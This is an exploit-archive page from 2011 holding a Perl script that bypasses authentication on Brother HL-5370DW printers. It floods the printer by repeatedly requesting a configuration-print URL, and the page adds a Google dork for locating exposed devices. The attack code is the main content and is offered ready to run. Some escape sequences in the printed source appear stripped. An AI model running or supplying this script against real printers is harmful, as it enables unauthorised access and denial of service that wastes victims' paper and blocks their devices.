[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Brother HL-5370DW series auth bypass printer flooder
# Published : 2011-05-31
# Author :
# Previous Title : SlimPDF Reader PoC
# Next Title : Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC
# Exploit Title: Brother HL-5370DW series auth bypass printer flooder
# Google Dork: Copyright(C) 2000-2009 Brother Industries, Ltd. All Rights Reserved. Brother HL-5370DW series
# Date: 31/05/2011
# Author: chrisB
# Contact : chrisb [@) gmx.fr
# Version: Brother HL-5370DW series
#!/usr/bin/perl
use LWP::Simple;
usage() unless $ARGV[1];
$replace = 'post/panel.html?EXECUTE2=PRTCONFIG';
$hint = $ARGV[1];
$goodurl = $ARGV[0];
$success = 0;
$goodurl =~ s/main.html/$replace/;
for ($count = $hint + 1; $count >= 1; $count--) {
$contents = get($goodurl);
if($contents =~ m/acknowledged/i)
{
$success++;
print "successn";
}
else
{
print "error, busy or no more papern";
}
}
print "pages printed : $success rn";
sub usage
{
print qq( Brother HL-5370DW series auth bypass printer flooder
Usage: perl $0 [http://url.fr/printer/main.html] [hints]
) and exit;
}